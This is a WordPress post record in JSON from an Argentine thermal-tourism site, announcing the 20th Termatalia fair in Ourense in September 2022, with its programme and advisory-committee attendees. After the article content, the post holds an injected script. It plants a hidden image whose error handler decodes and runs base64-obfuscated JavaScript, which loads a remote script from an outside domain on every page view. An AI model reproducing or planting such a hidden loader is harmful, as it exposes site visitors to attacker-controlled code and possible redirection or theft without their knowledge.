{"id":5791,"date":"2022-09-16T11:21:53","date_gmt":"2022-09-16T14:21:53","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5791"},"modified":"2025-08-13T16:13:03","modified_gmt":"2025-08-13T19:13:03","slug":"todo-listo-para-celebrar-el-20-aniversario-de-termatalia","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5791","title":{"rendered":"Todo listo para celebrar el 20\u00b0 aniversario de Termatalia"},"content":{"rendered":"\n<h4 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><strong><em>Veinte expertos de Espa\u00f1a y Portugal se reunieron en el segundo comit\u00e9 organizador de Termatalia para perfilar el programa de actividades profesionales y tambi\u00e9n las dirigidas al p\u00fablico general.<\/em><\/strong> <strong><em>La \u00faltima semana de septiembre, la provincia de Ourense acoge Termatalia (Feria Internacional de Turismo Termal, Salud y Bienestar); el Congreso Internacional de Turismo Termal organizado por EHTTA y la Diputaci\u00f3n de Ourense con el apoyo de la OMT y el XXI Congreso Nacional de la Sociedad Espa\u00f1ola de Hidrolog\u00eda M\u00e9dica<\/em><\/strong><\/h4>\n\n\n\n<p>Todo est\u00e1 preparado para celebrar el que ser\u00e1 el 20\u00ba aniversario de Termatalia, Feria Internacional de Turismo Termal, Salud y Bienestar que se celebra en Expourense (Ourense \u2013 Galicia \u2013 Espa\u00f1a) los d\u00edas 29 y 30 e septiembre de 2022. Esta cita coincide en espacio y tiempo con dos importantes eventos que convertir\u00e1n a la provincia de Ourense en epicentro mundial del termalismo durante la \u00faltima semana de septiembre de 2022 y que convocar\u00e1n a los profesionales del turismo de salud de una treintena de pa\u00edses.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"http:\/\/asicotur.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"728\" height=\"90\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/09\/202109-ASICOTUR-banner.gif\" alt=\"\" class=\"wp-image-5777\" \/><\/a><\/figure>\n\n\n\n<p>Adem\u00e1s de Termatalia, se celebra el Congreso Internacional de Turismo Termal del 27 a 29 de septiembre de 2022 y que est\u00e1 organizado por la Asociaci\u00f3n Europea de Ciudades Hist\u00f3ricas Termales (EHTTA) y la Diputaci\u00f3n Provincial de Ourense bajo el amparo de la Organizaci\u00f3n Mundial de Turismo. El 30 de septiembre por la tarde y hasta el 2 de octubre, entre Expourense y el Balneario de Laias se celebra el XXI Congreso Nacional de la Sociedad Espa\u00f1ola e Hidrolog\u00eda M\u00e9dica. En palabras del director de Termatalia, Rogelio Mart\u00ednez, \u201cson tres citas muy importantes, paralelas y complementarias, y quiero destacar la excelente colaboraci\u00f3n entre los organizadores de los tres eventos para coordinar la participaci\u00f3n del mayor n\u00famero de profesionales posible en todos ellos. El \u00e9xito de cada uno de estos encuentros es el \u00e9xito de todos\u201d. Aunque estos eventos van a poder seguirse de forma virtual desde cualquier parte del Mundo, se ha apostado firmemente por la presencialidad con el objetivo de que esa semana en Ourense suponga el gran punto de encuentro internacional de los profesionales del termalismo y turismo de salud despu\u00e9s de la pandemia.<\/p>\n\n\n\n<p>Termatalia 2022<br>Una veintena de expertos de Espa\u00f1a y Portugal participaron esta ma\u00f1ana en la segunda reuni\u00f3n del comit\u00e9 asesor de Termatalia en el que se perfilaron los detalles de las actividades profesionales, y tambi\u00e9n las orientadas al p\u00fablico general, que tendr\u00e1n lugar durante el 29 y el 30 de septiembre en Expourense como feria completa, presencial y como gran punto de reencuentro de la comunidad termal internacional.<\/p>\n\n\n\n<p>Durante esta reuni\u00f3n, el director de la feria, Rogelio Mart\u00ednez, present\u00f3 las acciones relacionadas con los tres ejes de Termatalia 2022: el negocio, la formaci\u00f3n especializada y el capital relacional que supone la recepci\u00f3n de profesionales de una treintena de pa\u00edses.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Negocio: Termatalia recibir\u00e1 expositores de una treintena de pa\u00edses de Europa y Am\u00e9rica. Entre los pa\u00edses que han apostado firmemente por esta edici\u00f3n cabe destacar Uruguay que ha confirmado la presencia en feria de su viceministro de Turismo, Remo Monzeglio, que participar\u00e1 acompa\u00f1ado de una amplia comitiva de empresarios termales de este pa\u00eds que ha acrecentado su inter\u00e9s y participaci\u00f3n en Termatalia en esta edici\u00f3n. Tambi\u00e9n est\u00e1 pr\u00e1cticamente cerrada ya tambi\u00e9n la bolsa de contrataci\u00f3n tur\u00edstica en la que participa una veintena de touroperadores de Espa\u00f1a, Alemania, Canad\u00e1, Colombia, Estados Unidos y Francia y que se reunir\u00e1n con los expositores de Termatalia.<\/li><li>Formaci\u00f3n: Ya est\u00e1 cerrado el programa de las Jornadas T\u00e9cnicas Profesionales de Termatalia 2022 cuya organizaci\u00f3n han dirigido desde el Vicerrectorado de la Universidad de Vigo. Estas jornadas abordar\u00e1n el agua termal desde distintas perspectivas: tur\u00edstica, patrimonial, cient\u00edfica y jur\u00eddica. Adem\u00e1s de las mesas redondas sobre el agua organizadas por la Universidad, las jornadas de Termatalia incluyen tambi\u00e9n la primera sesi\u00f3n del Congreso de la Sociedad de Hidrolog\u00eda M\u00e9dica que tendr\u00e1n lugar el viernes 30 de septiembre por la tarde. Esta sesi\u00f3n contar\u00e1 con la participaci\u00f3n de prestigiosos profesionales de la hidrolog\u00eda mundial, muchos de ellos aut\u00e9nticos gur\u00fas para los profesionales del sector como es el caso, por poner solamente un ejemplo, del Profesor Johan Lambeck de Suiza, referencia mundial en terapia acu\u00e1tica.<\/li><li><br>Estas jornadas incluir\u00e1n adem\u00e1s la presentaci\u00f3n a touroperadores y prensa especializada de aquellos destinos termales que apuestan por Termatalia como es el caso de la propia provincia de Ourense, de Uruguay o de las regiones de Murcia y Extremadura que ya son estrechos colaboradores de la feria, a los que en esta ocasi\u00f3n se suman las Villes Termales de Catalunya. Estas jornadas se complementan con cursos de formaci\u00f3n espec\u00edfica sobre aguas minerales y sobre peloides termales.<\/li><li><br>Actividades para el p\u00fablico general<br>Concretadas las acciones profesionales, durante esta reuni\u00f3n se perfilaron tambi\u00e9n las actividades que van a poder realizarse en feria para que el p\u00fablico general conozca todo lo que Termatalia tiene que ofrecer. Como es habitual, habr\u00e1 un Bar de Aguas con marcas internacionales de 4 pa\u00edse que participar\u00e1n en la XIX Cata Internacional de Aguas; un \u00e1rea de masajes; actividades relacionadas con el yoga wellness y un \u00e1rea de alimentaci\u00f3n saludable que incluye talleres de cocina, charlas sobre alimentaci\u00f3n consciente y mediciones antropom\u00e9tricas. Adem\u00e1s de distintas empresas, Termatalia ha involucrado adem\u00e1s a estudiantes de Formaci\u00f3n profesional de ramas relacionadas con el bienestar y la hosteler\u00eda y ya han confirmado la participaci\u00f3n en las actividades varios centros de FP de Galicia y Portugal.<\/li><li><\/li><\/ul>\n\n\n\n<p>Una de las novedades de este a\u00f1o es la celebraci\u00f3n en Expourense del World Coffee Challenge \u2013 Termatalia 2022 organizado por la empresa francesa Alternative Caf\u00e9. A ra\u00edz del mismo, este a\u00f1o habr\u00e1 tambi\u00e9n orientadas al caf\u00e9 como un Bar de Caf\u00e9s o un taller que explique la importancia del agua a la hora de elaborar un buen caf\u00e9. Este concurso ha tenido una excelente acogida y en \u00e9l participar\u00e1n productores de caf\u00e9 tostado en origen de m\u00e1s de 15 pa\u00edses de Am\u00e9rica, \u00c1frica y Asia.<\/p>\n\n\n\n<p>Reuni\u00f3n del Comit\u00e9 Asesor de Termatalia<br>En la reuni\u00f3n de esta ma\u00f1ana reuni\u00f3n representantes de las distintas administraciones, universidades, asociaciones profesionales y empresas relacionadas con el turismo de salud en ambos pa\u00edses. Dirigida por el director de Termatalia, Rogelio Mart\u00ednez, asistieron a este encuentro el delegado territorial de la Xunta de Galicia en Ourense, Gabriel Al\u00e9n y representando a la Agencia Gallega de Turismo de la Xunta de Galicia particip\u00f3 Cecilio Santalices; el vicepresidente de la Diputaci\u00f3n Provincial de Ourense y presidente del INORDE, Rosendo Fern\u00e1ndez acompa\u00f1ado por la gerente del Inorde, Emma Gonz\u00e1lez; y del director del \u00c1rea de Bienestar de la Diputaci\u00f3n de Ourense, Jos\u00e9 Juan Cerdeira; el director general del ICTE, Fernando Fraile; la Directora Territorial de Comercio en Galicia del Gobierno de Espa\u00f1a, Patricia P\u00e9rez la t\u00e9cnico de Turismo Porto e Norte, Cristina Mendes; el coordinador de Termas de Turismo Centro de Portugal, Adriano Barreto, y el representante del Cl\u00faster de Turismo e Galicia, Ovidio Fern\u00e1ndez.<\/p>\n\n\n\n<p>Representando a las distintas universidades y asociaciones sectoriales asistieron tambi\u00e9n el presidente de la Sociedad Espa\u00f1ola de Hidrolog\u00eda M\u00e9dica, Dr. Francisco Maraver; el nuevo director de la C\u00e1tedra de Hidrolog\u00eda M\u00e9dica de la Universidad de Santiago de Compostela, Dr. Jos\u00e9 Mart\u00edn Carreira; acompa\u00f1ado por el codirector Dr. Juan Gestal; la vicerrectora de la Universidad de Vigo, Elena Rivo; el decano de la Facultad de Historia de Campus de Ourense \u2013 Universidad de Vigo, Julio Prada; la decana de la Facultad de Ciencias Empresariales de Campus de Ourense \u2013 Universidad de Vigo, Montserrat Cruz; la representante de Peloides Termales, Carmen G\u00f3mez; el gerente de Balnearios de Galicia, Benigno Amor; el representante de Gala Termal y de la Asociaci\u00f3n Iberoamericana de Termalismo y Bienestar (AITB), Antonio Freire, y el representante del Grupo Caldaria, Vicente Boyer.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/todo-listo-para-celebrar-el-20o-aniversario-de-termatalia\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"127\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Banner-Termatalia-728x90-1-1024x127.jpg\" alt=\"\" class=\"wp-image-5566\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Banner-Termatalia-728x90-1-1024x127.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Banner-Termatalia-728x90-1-300x37.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Banner-Termatalia-728x90-1-768x95.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Banner-Termatalia-728x90-1-1536x190.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Banner-Termatalia-728x90-1-2048x254.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Banner-Termatalia-728x90-1-696x86.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Banner-Termatalia-728x90-1-1068x132.jpg 1068w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Veinte expertos de Espa\u00f1a y Portugal se reunieron en el segundo comit\u00e9 organizador de Termatalia para perfilar el programa de actividades profesionales y tambi\u00e9n las dirigidas al p\u00fablico general. La \u00faltima semana de septiembre, la provincia de Ourense acoge Termatalia (Feria Internacional de Turismo Termal, Salud y Bienestar); el Congreso Internacional de Turismo Termal organizado [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5792,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16,15,14,22,17],"tags":[],"class_list":["post-5791","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-medicina-termal","category-turismo-de-bienestar","category-turismo-salud","category-turismo-sostenible","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5791","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5791"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5791\/revisions"}],"predecessor-version":[{"id":10581,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5791\/revisions\/10581"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5792"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5791"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}